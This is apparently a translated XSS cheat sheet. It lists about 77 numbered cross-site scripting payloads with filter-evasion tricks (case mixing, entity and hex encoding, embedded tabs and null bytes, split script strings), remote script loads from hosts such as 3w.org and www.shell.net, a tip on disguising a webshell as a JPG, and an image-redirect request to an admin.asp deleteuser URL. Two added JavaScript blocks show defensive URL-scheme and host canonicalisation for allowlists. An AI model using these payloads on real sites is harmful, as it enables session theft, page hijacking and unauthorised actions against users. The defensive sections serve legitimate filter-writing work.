Cross-site image shell
XSS code: <script>alert("")</script>

Add the code to the first line of the webshell, then change the shell into JPG image format; when the image-format shell is accessed, our shell gets executed as well.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..[omitted]..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..[omitted]..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..[omitted]..XSS')>

(11) Embedded tab (shown as a space here), splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab (shown as a space here), splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline (shown as a space here)
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return (shown as a space here)
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
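Items (3) to (15), and later (17) to (19) and (47), are all the same trick seen from the defender's side: the browser decodes HTML entities in an attribute once, strips leading and trailing control characters and spaces, and drops tabs and newlines anywhere inside a URL before it looks at the scheme, so a filter that only checks the raw string for "javascript:" is comparing against something the browser never sees. The following check is an added example, not code from the original post; it applies that same normalisation first and then allowlists the scheme. The entity table and the allowlist contents are assumptions for the demonstration.

```javascript
// Added example (not from the original post): a defensive allowlist check for
// URL-valued attributes (href, src, background, ...). Normalise the value the
// way an HTML attribute and the URL parser would, then decide on the scheme.

const NAMED_ENTITIES = {
  tab: '\t', newline: '\n', colon: ':', amp: '&', lt: '<', gt: '>', quot: '"',
};

// Numeric character references with or without the trailing semicolon
// (&#106; &#0000106 &#x6A &#X6a), plus the few named ones that can spell a
// scheme. Decoded in a single pass, as a browser does; output is never
// re-decoded. (Assumption: only these named entities are relevant here.)
const ENTITY_RE = /&(?:#x([0-9a-f]+)|#([0-9]+)|(tab|newline|colon|amp|lt|gt|quot));?/gi;

function decodeHtmlEntities(s) {
  return s.replace(ENTITY_RE, (match, hex, dec, name) => {
    if (name !== undefined) return NAMED_ENTITIES[name.toLowerCase()];
    const n = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    // Out-of-range references become U+FFFD instead of throwing.
    return Number.isFinite(n) && n <= 0x10ffff ? String.fromCodePoint(n) : '\uFFFD';
  });
}

// Mirrors the WHATWG URL parser's pre-processing: strip leading and trailing
// C0 control or space characters, then remove ASCII tab, LF and CR anywhere.
function normalizeUrlValue(value) {
  let s = decodeHtmlEntities(String(value));
  s = s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  return s.replace(/[\t\n\r]/g, '');
}

// Returns the lower-cased scheme, 'relative' for scheme-less URLs, or
// 'invalid' when control characters survive normalisation (for example the
// embedded NUL of the perl vectors, which a lenient legacy parser may skip).
function urlScheme(value) {
  const s = normalizeUrlValue(value);
  if (/[\u0000-\u001f\u007f]/.test(s)) return 'invalid';
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : 'relative';
}

// Allowlist rather than blocklist: anything that is not plainly http(s),
// mailto or a relative path is rejected, so vbscript:, data: and unknown
// schemes never need a rule of their own. (Assumption: this set suits the app.)
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto', 'relative']);

function isSafeUrl(value) {
  return ALLOWED_SCHEMES.has(urlScheme(value));
}
```

Because the decision is made on the normalised scheme, mixed case, entity-encoded letters, embedded tabs or newlines and leading whitespace all collapse to the same answer; the residual-control-character rule is there so that a NUL-split scheme is rejected outright rather than passed through to a parser that might be more forgiving.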

(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters have basically no effect domestically, because there is nowhere they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript in Flash, you can mix your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
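Items (68) to (77) work against link filters that compare host names as strings: a browser accepts an IPv4 address written as a single decimal number, as hex or octal octets, as a mix of all three, or a domain name with a trailing dot, and resolves each spelling to the same place. The code below is an added example, not from the original post, showing how a defender canonicalises a host before comparing it with an allowlist. The IPv4 rules reimplement the WHATWG URL Standard's IPv4 parser (assumed to match it for the inputs shown); the base URL https://page.example/ and the allowlist contents are assumptions for the demonstration.

```javascript
// Added example (not from the original post): canonicalise the host of a link
// before an allowlist decision, so that the decimal, hex, octal and mixed IP
// spellings above and trailing-dot domain names compare equal to their
// canonical forms.

// One dotted component, parsed the way browsers do: 0x prefix means hex, a
// leading 0 means octal, anything else decimal. Returns null if not numeric.
function parseIpv4Part(part) {
  if (part === '') return null;
  let radix = 10, digits = part;
  if (/^0x/i.test(part)) { radix = 16; digits = part.slice(2); }
  else if (part.length > 1 && part[0] === '0') { radix = 8; digits = part.slice(1); }
  if (digits === '') return 0;                       // "0x" alone is zero
  const valid = { 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i, 8: /^[0-7]+$/ }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Returns the dotted-decimal form of an IPv4 literal, or null when the host
// is not an IPv4 literal (a domain name, or a malformed literal).
function parseIpv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop(); // trailing dot
  if (parts.length > 4) return null;
  const numbers = parts.map(parseIpv4Part);
  if (numbers.some(n => n === null)) return null;
  const last = numbers[numbers.length - 1];
  if (numbers.slice(0, -1).some(n => n > 255)) return null;
  // The last component may carry the remaining bytes ("3232235521" is all four).
  if (last >= 256 ** (5 - numbers.length)) return null;
  let value = last;
  numbers.slice(0, -1).forEach((n, i) => { value += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map(shift => (value >>> shift) & 255).join('.');
}

// Lower-case, rewrite IPv4 literals canonically, drop an absolute-DNS trailing dot.
function canonicalHost(host) {
  const h = host.trim().toLowerCase();
  const ip = parseIpv4(h);
  if (ip !== null) return ip;
  return h.endsWith('.') ? h.slice(0, -1) : h;
}

// Uses the platform's WHATWG URL parser to extract the host; relative links are
// resolved against a hypothetical page origin (assumption for this example).
function hostnameOf(href, base = 'https://page.example/') {
  try {
    return canonicalHost(new URL(href, base).hostname);
  } catch (e) {
    return null;                                     // unparseable: treat as unsafe
  }
}

// Constructed allowlist for the demonstration.
const ALLOWED_HOSTS = new Set(['www.google.com', 'google.com']);

function linkAllowed(href) {
  const host = hostnameOf(href);
  return host !== null && ALLOWED_HOSTS.has(host);
}
```

Canonicalising before comparing is what makes the allowlist meaningful: `3232235521`, `0xc0.0xa8.0x00.0x01` and `0300.0250.0000.0001` all become `192.168.0.1`, `www.google.com.` becomes `www.google.com`, and a `javascript:` link has no host at all and is rejected. Hosts should be compared only after this step, never on the raw attribute string.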